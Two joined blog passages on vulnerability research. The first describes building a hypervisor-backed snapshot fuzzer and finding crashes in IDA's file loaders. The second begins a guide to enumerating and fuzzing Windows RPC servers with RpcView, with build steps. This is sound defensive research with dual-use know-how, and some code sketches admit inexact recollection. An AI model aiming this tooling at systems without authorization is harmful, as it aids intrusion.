// Restore a GPA from the cache or from the dump file if no entry is
// available in the cache.
//

const uint8_t *Restore(const Gpa_t Gpa) {
  //
  // Get the HVA for the page we want to restore.
  //

  const uint8_t *SrcHva = GetHva(Gpa);

  //
  // Get the HVA for the page in RAM.
  //

  uint8_t *DstHva = Ram_ + Gpa.Align().U64();

  //
  // It is possible for a GPA to not exist in our cache and in the dump file.
  // For this to make sense, you have to remember that the crash-dump does not
  // contain the whole amount of RAM. In which case, the guest OS can decide
  // to allocate new memory backed by physical pages that were not dumped
  // because not currently used by the OS.
  //
  // When this happens, we simply zero initialize the page as.. this is
  // basically the best we can do. The hope is that if this behavior is not
  // correct, the rest of the execution simply explodes pretty fast.
  //

  if (!SrcHva) {
    memset(DstHva, 0, Page::Size);
  }

  //
  // Otherwise, this is straight forward, we restore the source into the
  // destination. If we had a copy, then that is what we are writing to the
  // destination, and if we didn't have a copy then we are restoring the
  // content from the crash-dump.
  //

  else {
    memcpy(DstHva, SrcHva, Page::Size);
  }

  //
  // Return the HVA to the user in case it needs to know about it.
  //

  return DstHva;
}

Problem 7: Code coverage with IDA

I mentioned above that I was using IDA to generate the list of code coverage breakpoints that wtf needed. At first, I thought this was a bulletproof technique, but I encountered a pretty annoying bug where IDA tagged switch-tables as code instead of data. This led to wtf corrupting switch-tables with cc's, and the guest crashed in spectacular ways.

I haven't run into this bug with the latest version of IDA yet, which is nice.

Problem 8: Rounds of optimization

After profiling the fuzzer, I noticed that WHvQueryGpaRangeDirtyBitmap was extremely slow for unknown reasons.

To fix this, I ended up emulating the feature by mapping memory as read / execute in the EPT and tracking dirtiness myself when receiving a memory fault caused by a write.

HRESULT
WhvBackend_t::OnExitReasonMemoryAccess(
    const WHV_RUN_VP_EXIT_CONTEXT &Exception) {
  const Gpa_t Gpa = Gpa_t(Exception.MemoryAccess.Gpa);
  const bool WriteAccess =
      Exception.MemoryAccess.AccessInfo.AccessType == WHvMemoryAccessWrite;

  if (!WriteAccess) {
    fmt::print("Dont know how to handle this fault, exiting.\n");
    __debugbreak();
    return E_FAIL;
  }

  //
  // Remap the page as writeable.
  //

  const WHV_MAP_GPA_RANGE_FLAGS Flags = WHvMapGpaRangeFlagWrite |
                                        WHvMapGpaRangeFlagRead |
                                        WHvMapGpaRangeFlagExecute;

  const Gpa_t AlignedGpa = Gpa.Align();
  DirtyGpa(AlignedGpa);

  uint8_t *AlignedHva = PhysTranslate(AlignedGpa);
  return MapGpaRange(AlignedHva, AlignedGpa, Page::Size, Flags);
}

Once fixed, I noticed that WHvTranslateGva was also slower than I expected. This is why I emulated its behavior as well, by walking the page tables myself:

HRESULT
WhvBackend_t::TranslateGva(const Gva_t Gva, const WHV_TRANSLATE_GVA_FLAGS,
                           WHV_TRANSLATE_GVA_RESULT &TranslationResult,
                           Gpa_t &Gpa) const {

  //
  // Stole most of the logic from @yrp604's code so thx bro.
  //

  const VIRTUAL_ADDRESS GuestAddress = Gva.U64();
  const MMPTE_HARDWARE Pml4 = GetReg64(WHvX64RegisterCr3);
  const uint64_t Pml4Base = Pml4.PageFrameNumber * Page::Size;
  const Gpa_t Pml4eGpa = Gpa_t(Pml4Base + GuestAddress.Pml4Index * 8);
  const MMPTE_HARDWARE Pml4e = PhysRead8(Pml4eGpa);
  if (!Pml4e.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  const uint64_t PdptBase = Pml4e.PageFrameNumber * Page::Size;
  const Gpa_t PdpteGpa = Gpa_t(PdptBase + GuestAddress.PdPtIndex * 8);
  const MMPTE_HARDWARE Pdpte = PhysRead8(PdpteGpa);
  if (!Pdpte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // huge pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // directory; see Table 4-1
  //

  const uint64_t PdBase = Pdpte.PageFrameNumber * Page::Size;
  if (Pdpte.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PdBase + (Gva.U64() & 0x3fff'ffff));
    return S_OK;
  }

  const Gpa_t PdeGpa = Gpa_t(PdBase + GuestAddress.PdIndex * 8);
  const MMPTE_HARDWARE Pde = PhysRead8(PdeGpa);
  if (!Pde.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // large pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // table; see Table 4-18
  //

  const uint64_t PtBase = Pde.PageFrameNumber * Page::Size;
  if (Pde.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PtBase + (Gva.U64() & 0x1f'ffff));
    return S_OK;
  }

  const Gpa_t PteGpa = Gpa_t(PtBase + GuestAddress.PtIndex * 8);
  const MMPTE_HARDWARE Pte = PhysRead8(PteGpa);
  if (!Pte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
  const uint64_t PageBase = Pte.PageFrameNumber * 0x1000;
  Gpa = Gpa_t(PageBase + GuestAddress.Offset);
  return S_OK;
}

Collecting dividends

Comparing the two backends, whv showed about 15x better performance than bochscpu. I honestly was a bit disappointed, as I expected more of a 100x performance increase, but I guess it was still a significant perf improvement:

bochscpu:
#1 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 0.0s crash: 0 timeout: 0 cr3: 0
#2 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 12.0s crash: 0 timeout: 0 cr3: 0
#3 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 25.0s crash: 0 timeout: 0 cr3: 0
#4 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 38.0s crash: 0 timeout: 0 cr3: 0

whv:
#12 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 6.0s crash: 0 timeout: 0 cr3: 0
#30 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 16.0s crash: 0 timeout: 0 cr3: 0
#48 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 27.0s crash: 0 timeout: 0 cr3: 0
#66 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 37.0s crash: 0 timeout: 0 cr3: 0
#84 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 47.0s crash: 0 timeout: 0 cr3: 0

The speed started to be good enough for me to run it overnight and discover my first few crashes, which was exciting even though they were just interrs (IDA internal errors).

2 fast 2 furious: KVM backend

I really wanted to start fuzzing IDA on some proper hardware. It was pretty clear that renting Windows machines in the cloud with nested virtualization enabled wasn't widespread or cheap. On top of that, I was still disappointed by the performance of whv, and so I was eager to see how battle-tested hypervisors like Xen or KVM would measure up.

I didn't know anything about those VMMs, but I quickly discovered that KVM is available in the Linux kernel and exposes a user-mode API resembling whv's via /dev/kvm. This looked perfect, because if it was similar enough to whv, I could probably write a backend for it easily. The KVM API powers Firecracker, a project that creates micro-VMs to run various workloads in the cloud. I assumed that you would need rich features as well as good performance to be the foundational technology of such a project.

The KVM API works very similarly to whv, and as a result I will not repeat the previous part. Instead, I will just walk you through some of the differences and the things I enjoyed more with KVM.
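To give a feel for the API, here is a hedged sketch of the basic initialization dance with /dev/kvm; error handling is minimal, and the memory-slot and register setup that a real backend needs are left out:

//
// Hedged sketch: open /dev/kvm, create a VM and a single virtual CPU.
//
#include <cstdio>
#include <fcntl.h>
#include <linux/kvm.h>
#include <sys/ioctl.h>

bool CreateVmAndVcpu(int &Kvm, int &Vm, int &Vp) {
  Kvm = open("/dev/kvm", O_RDWR | O_CLOEXEC);
  if (Kvm < 0) {
    perror("open /dev/kvm");
    return false;
  }

  //
  // Sanity check the API version exposed by the kernel.
  //

  if (ioctl(Kvm, KVM_GET_API_VERSION, 0) != KVM_API_VERSION) {
    fprintf(stderr, "Unexpected KVM API version.\n");
    return false;
  }

  Vm = ioctl(Kvm, KVM_CREATE_VM, 0);
  if (Vm < 0) {
    perror("KVM_CREATE_VM");
    return false;
  }

  Vp = ioctl(Vm, KVM_CREATE_VCPU, 0);
  if (Vp < 0) {
    perror("KVM_CREATE_VCPU");
    return false;
  }

  return true;
}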

GPRs available through shared-memory

To avoid sending an IOCTL every time you want the value of a guest GPR, KVM allows you to map a shared memory region with the kernel where the registers are laid out:

//
// Get the size of the shared kvm run structure.
//

VpMmapSize_ = ioctl(Kvm_, KVM_GET_VCPU_MMAP_SIZE, 0);
if (VpMmapSize_ < 0) {
  perror("Could not get the size of the shared memory region.");
  return false;
}

//
// Man says:
//   there is an implicit parameter block that can be obtained by mmap()'ing
//   the vcpu fd at offset 0, with the size given by KVM_GET_VCPU_MMAP_SIZE.
//

Run_ = (struct kvm_run *)mmap(nullptr, VpMmapSize_, PROT_READ | PROT_WRITE,
                              MAP_SHARED, Vp_, 0);
if (Run_ == MAP_FAILED) {
  perror("mmap VCPU_MMAP_SIZE");
  return false;
}
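The GPR part of that story goes through the synced-register area of the same mapping; below is a hedged sketch of how it might be used, assuming KVM_CAP_SYNC_REGS has been checked with KVM_CHECK_EXTENSION beforehand (field names are from linux/kvm.h as I remember them):

//
// Hedged sketch: ask KVM to mirror the GPRs into the shared kvm_run mapping
// so that reading RAX after a vmexit doesn't require a KVM_GET_REGS ioctl.
//
#include <cstdint>
#include <linux/kvm.h>
#include <sys/ioctl.h>

uint64_t RunAndReadRax(const int Vp, struct kvm_run *Run) {
  //
  // Request the general purpose registers to be synced on the next exit.
  //

  Run->kvm_valid_regs = KVM_SYNC_X86_REGS;

  if (ioctl(Vp, KVM_RUN, 0) < 0) {
    return 0;
  }

  //
  // The registers are now available directly from the shared mapping.
  //

  return Run->s.regs.regs.rax;
}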

On-demand paging

Implementing on-demand paging with KVM was very easy. It uses userfaultfd, so you can just start a thread that polls the fd and services the requests:

void KvmBackend_t::UffdThreadMain() {
  while (!UffdThreadStop_) {

    //
    // Set up the pool fd with the uffd fd.
    //

    struct pollfd PoolFd = {.fd = Uffd_, .events = POLLIN};

    int Res = poll(&PoolFd, 1, 6000);
    if (Res < 0) {

      //
      // Sometimes poll returns -EINTR when we are trying to kick off the CPU
      // out of KVM_RUN.
      //

      if (errno == EINTR) {
        fmt::print("Poll returned EINTR\n");
        continue;
      }

      perror("poll");
      exit(EXIT_FAILURE);
    }

    //
    // This is the timeout, so we loop around to have a chance to check for
    // UffdThreadStop_.
    //

    if (Res == 0) {
      continue;
    }

    //
    // You get the address of the access that triggered the missing page event
    // out of a struct uffd_msg that you read in the thread from the uffd. You
    // can supply as many pages as you want with UFFDIO_COPY or UFFDIO_ZEROPAGE.
    // Keep in mind that unless you used DONTWAKE then the first of any of those
    // IOCTLs wakes up the faulting thread.
    //

    struct uffd_msg UffdMsg;
    Res = read(Uffd_, &UffdMsg, sizeof(UffdMsg));
    if (Res < 0) {
      perror("read");
      exit(EXIT_FAILURE);
    }

    //
    // Let's ensure we are dealing with what we think we are dealing with.
    //

    if (Res != sizeof(UffdMsg) || UffdMsg.event != UFFD_EVENT_PAGEFAULT) {
      fmt::print("The uffdmsg or the type of event we received is unexpected, "
                 "bailing.");
      exit(EXIT_FAILURE);
    }

    //
    // Grab the HVA off the message.
    //

    const uint64_t Hva = UffdMsg.arg.pagefault.address;

    //
    // Compute the GPA from the HVA.
    //

    const Gpa_t Gpa = Gpa_t(Hva - uint64_t(Ram_.Hva()));

    //
    // Page it in.
    //

    RunStats_.UffdPages++;
    const uint8_t *Src = Ram_.GetHvaFromDump(Gpa);
    if (Src != nullptr) {
      const struct uffdio_copy UffdioCopy = {
          .dst = Hva,
          .src = uint64_t(Src),
          .len = Page::Size,
      };

      //
      // The primary ioctl to resolve userfaults is UFFDIO_COPY. That atomically
      // copies a page into the userfault registered range and wakes up the
      // blocked userfaults (unless uffdio_copy.mode & UFFDIO_COPY_MODE_DONTWAKE
      // is set). Other ioctl works similarly to UFFDIO_COPY. They’re atomic as
      // in guaranteeing that nothing can see an half copied page since it’ll
      // keep userfaulting until the copy has finished.
      //

      Res = ioctl(Uffd_, UFFDIO_COPY, &UffdioCopy);
      if (Res < 0) {
        perror("UFFDIO_COPY");
        exit(EXIT_FAILURE);
      }
    } else {
      const struct uffdio_zeropage UffdioZeroPage = {
          .range = {.start = Hva, .len = Page::Size}};

      Res = ioctl(Uffd_, UFFDIO_ZEROPAGE, &UffdioZeroPage);
      if (Res < 0) {
        perror("UFFDIO_ZEROPAGE");
        exit(EXIT_FAILURE);
      }
    }
  }
}
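For completeness, here is a hedged sketch of the registration side that such a thread relies on; the RAM address and size are placeholders, and a real backend would also check the features / ioctls returned by the handshake:

//
// Hedged sketch: create a userfaultfd and register the guest RAM mapping so
// that missing-page faults get reported to the polling thread above.
//
#include <cstdint>
#include <cstdio>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <unistd.h>

int RegisterRamWithUffd(void *RamHva, const uint64_t RamSize) {
  const int Uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
  if (Uffd < 0) {
    perror("userfaultfd");
    return -1;
  }

  //
  // Handshake on the API version we expect.
  //

  struct uffdio_api UffdioApi = {.api = UFFD_API, .features = 0};
  if (ioctl(Uffd, UFFDIO_API, &UffdioApi) < 0) {
    perror("UFFDIO_API");
    return -1;
  }

  //
  // Ask to be notified about missing pages in the RAM region.
  //

  struct uffdio_register UffdioRegister = {
      .range = {.start = uint64_t(RamHva), .len = RamSize},
      .mode = UFFDIO_REGISTER_MODE_MISSING,
  };

  if (ioctl(Uffd, UFFDIO_REGISTER, &UffdioRegister) < 0) {
    perror("UFFDIO_REGISTER");
    return -1;
  }

  return Uffd;
}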

Timeout

Another cool thing is that KVM exposes the Performance Monitoring Unit to the guest if the hardware supports it. When it does, I am able to program the PMU to trigger an interruption after an arbitrary number of retired instructions. This is useful because, when MSR_IA32_FIXED_CTR0 overflows, it triggers a special interrupt called a PMI, which Windows delivers via vector 0xFE of the CPU's IDT. To catch it, we simply break on hal!HalpPerfInterrupt:

//
// This is to catch the PMI interrupt if performance counters are used to
// bound execution.
//

if (!g_Backend->SetBreakpoint("hal!HalpPerfInterrupt",
                              [](Backend_t *Backend) {
                                CrashDetectionPrint("Perf interrupt\n");
                                Backend->Stop(Timedout_t());
                              })) {
  fmt::print("Could not set a breakpoint on hal!HalpPerfInterrupt, but "
              "carrying on..\n");
}

To make it work, you have to program the APIC a little bit, and I remember struggling to get the interrupt to fire. I am still not 100% sure that I got all the details right, but the interrupt triggered consistently during my tests, so I called it a day. I would also like to revisit this area in the future, as there might be other features I could use for the fuzzer.
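To make the MSR side of that a bit more concrete, here is a heavily hedged sketch of arming fixed counter 0 (which counts retired instructions); the control-bit layout is from the Intel SDM as I remember it, a 48-bit counter width is assumed, and whether wtf programs these through KVM_SET_MSRS or from inside the guest snapshot is not something this sketch claims:

//
// Hedged sketch: preload IA32_FIXED_CTR0 so it overflows (and raises a PMI)
// after roughly `Limit` retired instructions. The APIC LVT programming
// mentioned above is not shown.
//
#include <cstdint>
#include <linux/kvm.h>
#include <sys/ioctl.h>

constexpr uint32_t IA32_FIXED_CTR0 = 0x309;
constexpr uint32_t IA32_FIXED_CTR_CTRL = 0x38d;
constexpr uint32_t IA32_PERF_GLOBAL_CTRL = 0x38f;

bool ArmInstructionLimit(const int Vp, const uint64_t Limit) {
  alignas(struct kvm_msrs) uint8_t
      Buffer[sizeof(struct kvm_msrs) + 3 * sizeof(struct kvm_msr_entry)] = {};
  auto *Msrs = reinterpret_cast<struct kvm_msrs *>(Buffer);
  Msrs->nmsrs = 3;

  // Counter value that overflows after `Limit` instructions (48-bit width
  // assumed).
  Msrs->entries[0].index = IA32_FIXED_CTR0;
  Msrs->entries[0].data = (1ULL << 48) - Limit;

  // Enable fixed counter 0 for kernel & user, and enable the PMI on overflow.
  Msrs->entries[1].index = IA32_FIXED_CTR_CTRL;
  Msrs->entries[1].data = 0b1011;

  // Globally enable fixed counter 0.
  Msrs->entries[2].index = IA32_PERF_GLOBAL_CTRL;
  Msrs->entries[2].data = 1ULL << 32;

  // KVM_SET_MSRS returns the number of MSRs successfully set.
  return ioctl(Vp, KVM_SET_MSRS, Msrs) == 3;
}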

Problem 9: Running it in the cloud

The KVM backend development was done on a laptop, in a Hyper-V VM with nested virtualization turned on. It worked great, but it was not powerful, and so I wanted to run it on real hardware. After shopping around, I realized that Amazon didn't have any offers that supported nested virtualization and that only Microsoft's Azure had SKUs with nested virtualization available. I rented one of them to try it out, and the hardware didn't support the VMX feature called unrestricted_guest. I can't quite remember why it mattered, but it had to do with real mode & the APIC and the way I create memory slots. I had developed the backend assuming this feature would be available, and so I didn't use Azure either.

Instead, I rented a bare-metal server on Vultr for about $100 / month. The CPU was a Xeon E3-1270v6 processor, 4 cores, 8 threads @ 3.8GHz, which seemed good enough for my usage. The hardware had a PMU, and that is also where I developed wtf's support for it.

I was pretty happy, because the fuzzer was running about 10x faster than whv. It is not a fair comparison, because those numbers weren't acquired on the same hardware, but still:

#123 cov: 25521 corp: 0 exec/s: 12.3 lastcov: 9.0s crash: 0 timeout: 0 cr3: 0
#252 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 19.0s crash: 0 timeout: 0 cr3: 0
#381 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 29.0s crash: 0 timeout: 0 cr3: 0
#510 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 39.0s crash: 0 timeout: 0 cr3: 0
#639 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 49.0s crash: 0 timeout: 0 cr3: 0
#768 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 59.0s crash: 0 timeout: 0 cr3: 0
#897 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 1.1min crash: 0 timeout: 0 cr3: 0

To give you more details, this test case generated executions of around 195 million instructions, with the following stats (generated by bochscpu):

Run stats:
Instructions executed: 194593453 (260546 unique)
          Dirty pages: 9166848 bytes (0 MB)
      Memory accesses: 411196757 bytes (24 MB)

Problem 10: Minsetting a 1.6m files corpus

In parallel with coding wtf, I acquired a fairly large corpus made of the weirdest ELFs possible. I built this corpus of 1.6 million ELF files, and I now needed to minset it. Because of the way I had architected wtf, minsetting was a serial process. I could have gone the AFL route and generated execution traces that eventually get merged together, but I didn't like this idea either.

Instead, I re-architected wtf into a client and a server. The server owns the coverage, the corpus, and the mutator; it just distributes test cases to clients and receives code coverage reports from them. You can see the clients as runners that send their results back to the server. All the important state is kept on the server.

This model was nice because it automatically meant that I could fully utilize the hardware I was renting to minset those files. As an example, minsetting this corpus of files with a single core would probably have taken weeks to complete, but it took 8 hours with this new architecture:

#1972714 cov: 74065 corp: 3176 (58mb) exec/s: 64.2 (8 nodes) lastcov: 3.0s crash: 49 timeout: 71 cr3: 48 uptime: 8hr

Wrapping up

In this post, we went through the birth of wtf, a distributed, code-coverage-guided, customizable, cross-platform, snapshot-based fuzzer designed for attacking user and/or kernel-mode targets running on Microsoft Windows. It also led to writing and open-sourcing a number of other small projects: lockmem, inject, kdmp-parser and symbolizer.

We went from zero to dozens of unique crashes in various IDA components: libdwarf64.dll, dwarf64.dll, elf64.dll and pdb64.dll. The findings were really diverse: null dereferences, stack overflows, divisions by zero, infinite loops, use-after-frees, and out-of-bounds accesses. I have compiled all of my findings in the following GitHub repository: fuzzing-ida75.

[Image: bounty.png]

I probably fuzzed for an entire month, but most of the crashes popped up in the first two weeks. According to lighthouse, I managed to cover about 80% of elf64.dll, 50% of dwarf64.dll and 26% of libdwarf64.dll, with a minset of about 2.4k files for a total of 17MB.

[Image: elf64.png – lighthouse coverage of elf64.dll]

Before signing out, I wanted to thank the IDA Hex-Rays team for handling & fixing my reports at an amazing speed. I highly recommend you try out their bounty program, as I am sure there's a lot to be found.

Finally big up to my bros yrp604 & __x86 for proofreading this article.

Fuzzing Windows RPC with RpcView

The recent release of PetitPotam by @topotam77 motivated me to get back to Windows RPC fuzzing. On this occasion, I thought it would be cool to write a blog post explaining how one can get into this security research area.

RPC as a Fuzzing Target?

As you know, RPC stands for “Remote Procedure Call”, and it isn’t a Windows specific concept. The first implementations of RPC were made on UNIX systems in the eighties. This allowed machines to communicate with each other on a network, and it was even “used as the basis for Network File System (NFS)” (source: Wikipedia).

The RPC implementation developed by Microsoft and used on Windows is DCE/RPC, which is short for “Distributed Computing Environment / Remote Procedure Calls” (source: Wikipedia). DCE/RPC is only one of the many IPC (Interprocess Communications) mechanisms used in Windows. For example, it’s used to allow a local process or even a remote client on the network to interact with another process or a service on a local or remote machine.

As you will have understood, the security implications of such a protocol are particularly interesting. Vulnerabilities in an RPC server may have various consequences, ranging from Denial of Service (DoS) to Remote Code Execution (RCE), and including Local Privilege Escalation (LPE). Coupled with the fact that the code of the legacy RPC servers on Windows is often quite old (if we exclude the more recent (D)COM model), this makes it a very interesting target for fuzzing.

How to Fuzz Windows RPC?

To be clear, this post is not about advanced and automated fuzzing. Others, far more talented than me, already discussed this topic. Rather, I want to show how a beginner can get into this kind of research without any knowledge in this field.

Pentesters use Windows RPC every time they work in Windows / Active Directory environments with impacket-based tools, perhaps without always being fully aware of it. The use of Windows RPC was probably made a bit more obvious with tools such as SpoolSample (a.k.a the “Printer Bug”) by @tifkin_ or, more recently, PetitPotam by @topotam77.

If you want to know how these tools work, or if you want to find bugs in Windows RPC by yourself, I think there are two main approaches. The first approach consists in looking for interesting keywords in the documentation and then experimenting, by modifying the impacket library or by writing an RPC client in C. As explained by @topotam77 in episode 0x09 of the French Hack’n Speak podcast, this approach was particularly efficient in the conception of PetitPotam. However, it has some limitations. The main one is that not all RPC interfaces are documented, and even the existing documentation isn’t always complete. Therefore, the second approach consists in enumerating the RPC servers directly on a Windows machine, with a tool such as RpcView.

RpcView

If you are new to Windows RPC analysis, RpcView is probably the best tool to get started. It is able to enumerate all the RPC servers that are running on a machine and it provides all the collected information in a very neat GUI (Graphical User Interface). When you are not yet familiar with a technical and/or abstract concept, being able to visualize things this way is an undeniable benefit.

Note: this screenshot was taken from https://rpcview.org/.

This tool was originally developed by 4 French researchers - Jean-Marie Borello, Julien Boutet, Jeremy Bouetard and Yoanne Girardin (see authors) - in 2017 and is still actively maintained. Its use was highlighted at PacSec 2017 in the presentation A view into ALPC-RPC by Clément Rouault and Thomas Imbert. This presentation also came along with the tool RPCForge.

Downloading and Running RpcView for the First Time

RpcView’s official repository is located here: https://github.com/silverf0x/RpcView. For each commit, a new release is automatically built through AppVeyor. So, you can always download the latest version of RpcView here.

After extracting the 7z archive, you just have to execute RpcView.exe (ideally as an administrator), and you should be ready to go. However, if the version of Windows you are using is too recent, you will probably get an error similar to the one below.

According to the error message, our “runtime version” is not supported, and we are supposed to send our rpcrt4.dll file to the dev team. This message may sound a bit cryptic for a neophyte but there is nothing to worry about, that’s completely fine.

The library rpcrt4.dll, as its name suggests, literally contains the “RPC runtime”. In other words, it contains all the necessary base code that allows an RPC client and an RPC server to communicate with each other.

Now, if we take a look at the README on GitHub, we can see that there is a section entitled How to add a new RPC runtime. It tells us that there are two ways to solve this problem. The first way is to just edit the file RpcInternals.h and add our runtime version. The second way is to reverse rpcrt4.dll in order to define the required structures such as RPC_SERVER. Honestly, the implementation of the RPC runtime doesn’t change that often, so the first option is perfectly fine in our case.

Compiling RpcView

We saw that our RPC runtime is not currently supported, so we will have to update RpcInternals.h with our runtime version and build RpcView from the source. To do so, we will need the following:

  • Visual Studio 2019 (Community)
  • CMake >= 3.13.2
  • Qt5 == 5.15.2

Note: I strongly recommend using a Virtual Machine for this kind of setup. For your information, I also use Chocolatey - the package manager for Windows - to automate the installation of some of the tools (e.g.: Visual Studio, GIT tools).

Installing Visual Studio 2019

You can download Visual Studio 2019 here or install it with Chocolatey.

choco install visualstudio2019community

While you’re at it, you should also install the Windows SDK as you will need it later on. I use the following code in PowerShell to find the latest available version of the SDK.

[string[]]$sdks = (choco search windbg | findstr "windows-sdk")
$sdk_latest = ($sdks | Sort-Object -Descending | Select -First 1).split(" ")[0]

And I install it with Chocolatey. If you want to install it manually, you can also download the web installer here.

choco install $sdk_latest

Once Visual Studio is installed, you have to open the “Visual Studio Installer”.

And install the “Desktop development with C++” toolkit. I hope you have a solid Internet connection and enough disk space… :grimacing:

Installing CMake

Installing CMake is as simple as running the following command with Chocolatey. But, again, you can also download it from the official website and install it manually.

choco install cmake

Note: CMake is also part of Visual Studio “Desktop development with C++”, but I never tried to compile RpcView with this version.

Installing Qt

At the time of writing, the README specifies that the version of Qt used by the project is 5.15.2. I highly recommend using the exact same version, otherwise you will likely get into trouble during the compilation phase.

The question is: how do you find and download Qt5 5.15.2? That’s where things get a bit tricky, because the process is a bit convoluted. First, you need to register an account here. This will allow you to use their custom web installer. Then, you need to download the installer here.

Once you have started the installer, it will prompt you to log in with your Qt account.

After that, you can leave everything as default. However, at the “Select Components” step, make sure to select Qt 5.15.2 for MSVC 2019 32 & 64 bits only. That’s already 2.37 GB of data to download, but if you select everything, that represents around 60 GB. :open_mouth:

If you are lucky enough, the installer should run flawlessly, but if you are not, you will probably encounter an error similar to the one below. At the time of writing, an issue is currently open on their bug tracker here, but they don’t seem to be in a hurry to fix it.

To solve this problem, I wrote a quick and dirty PowerShell script that downloads all the required files directly from the closest Qt mirror. That’s probably against the terms of use, but hey, what can you do?! I just wanted to get the job done.

If you leave all the values as default, the script will download and extract all the required files for Visual Studio 2019 (32 & 64 bits) in C:\Qt\5.15.2\.

Note: make sure 7-Zip is installed before running this script!

# Update these settings according to your needs but the default values should be just fine.
$DestinationFolder = "C:\Qt"
$QtVersion = "qt5_5152"
$Target = "msvc2019"
$BaseUrl = "https://download.qt.io/online/qtsdkrepository/windows_x86/desktop"
$7zipPath = "C:\Program Files\7-Zip\7z.exe"

# Store all the 7z archives in a Temp folder.
$TempFolder = Join-Path -Path $DestinationFolder -ChildPath "Temp"
$null = [System.IO.Directory]::CreateDirectory($TempFolder)

# Build the URLs for all the required components.
$AllUrls = @("$($BaseUrl)/tools_qtcreator", "$($BaseUrl)/$($QtVersion)_src_doc_examples", "$($BaseUrl)/$($QtVersion)")

# For each URL, retrieve and parse the "Updates.xml" file. This file contains all the information
# we need to download all the required files.
foreach ($Url in $AllUrls) {
    $UpdateXmlUrl = "$($Url)/Updates.xml"
    $UpdateXml = [xml](New-Object Net.WebClient).DownloadString($UpdateXmlUrl)
    foreach ($PackageUpdate in $UpdateXml.GetElementsByTagName("PackageUpdate")) {
        $DownloadableArchives = @()
        if ($PackageUpdate.Name -like "*$($Target)*") {
            $DownloadableArchives += $PackageUpdate.DownloadableArchives.Split(",") | ForEach-Object { $_.Trim() } | Where-Object { -not [string]::IsNullOrEmpty($_) }
        }
        $DownloadableArchives | Sort-Object -Unique | ForEach-Object {
            $Filename = "$($PackageUpdate.Version)$($_)"
            $TempFile = Join-Path -Path $TempFolder -ChildPath $Filename
            $DownloadUrl = "$($Url)/$($PackageUpdate.Name)/$($Filename)"
            if (Test-Path -Path $TempFile) {
                Write-Host "File $($Filename) found in Temp folder!"
            }
            else {
                Write-Host "Downloading $($Filename) ..."
                (New-Object Net.WebClient).DownloadFile($DownloadUrl, $TempFile)
            }
            Write-Host "Extracting file $($Filename) ..."
            &"$($7zipPath)" x -o"$($DestinationFolder)" $TempFile | Out-Null
        }
    }
}

Building RpcView

We should be ready to go. One last piece is missing though: the RPC runtime version. When I first tried to build RpcView from the source files, I was a bit confused and I didn’t really know which version number was expected, but it’s actually very simple (once you know what to look for…).

You just have to open the properties of the file C:\Windows\System32\rpcrt4.dll and get the File Version. In my case, it’s 10.0.19041.1081.

Then, you can download the source code.

git clone https://github.com/silverf0x/RpcView

After that, we have to edit both .\RpcView\RpcCore\RpcCore4_64bits\RpcInternals.h and .\RpcView\RpcCore\RpcCore4_32bits\RpcInternals.h. At the beginning of these files, there is a static array that contains all the supported runtime versions.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL,  //6.3.9431.0000
    0x6000325804000LL,  //6.3.9600.16384
    ...
    0xA00004A6102EALL,  //10.0.19041.746
    0xA00004A61041CLL,  //10.0.19041.1052
};

We can see that each version number is represented as a 64-bit long long value. For example, the version 10.0.19041.1052 translates to:

0xA00004A61041C = 0x000A (10) || 0x0000 (0) || 0x4A61 (19041) || 0x041C (1052)

If we apply the same conversion to the version number 10.0.19041.1081, we get the following result.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL,  //6.3.9431.0000
    0x6000325804000LL,  //6.3.9600.16384
    ...
    0xA00004A6102EALL,  //10.0.19041.746
    0xA00004A61041CLL,  //10.0.19041.1052
    0xA00004A610439LL,  //10.0.19041.1081
};
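If you'd rather not do the conversion by hand, a tiny helper along these lines (an illustrative sketch, not part of RpcView) produces the packed value from the four components of the file version:

#include <cstdint>
#include <cstdio>

// Packs "major.minor.build.revision" into the 64-bit layout used by the
// RPC_CORE_RUNTIME_VERSION array: 16 bits per component, most significant
// component first.
uint64_t PackRuntimeVersion(uint16_t Major, uint16_t Minor, uint16_t Build,
                            uint16_t Revision) {
  return (uint64_t(Major) << 48) | (uint64_t(Minor) << 32) |
         (uint64_t(Build) << 16) | uint64_t(Revision);
}

int main() {
  // 10.0.19041.1081 -> 0xA00004A610439
  printf("0x%llXLL\n",
         (unsigned long long)PackRuntimeVersion(10, 0, 19041, 1081));
  return 0;
}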

Finally, we can generate the Visual Studio solution and build it. I will only show the 64-bit compilation process, but if you want to compile the 32-bit version, you can refer to the documentation. The process is very similar anyway.

For the next commands, I assume the following:

  • Qt is installed in C:\Qt\5.15.2\.
  • CMake is installed in C:\Program Files\CMake\.
  • The current working directory is RpcView’s source folder (e.g.: C:\Users\lab-user\Downloads\RpcView\).
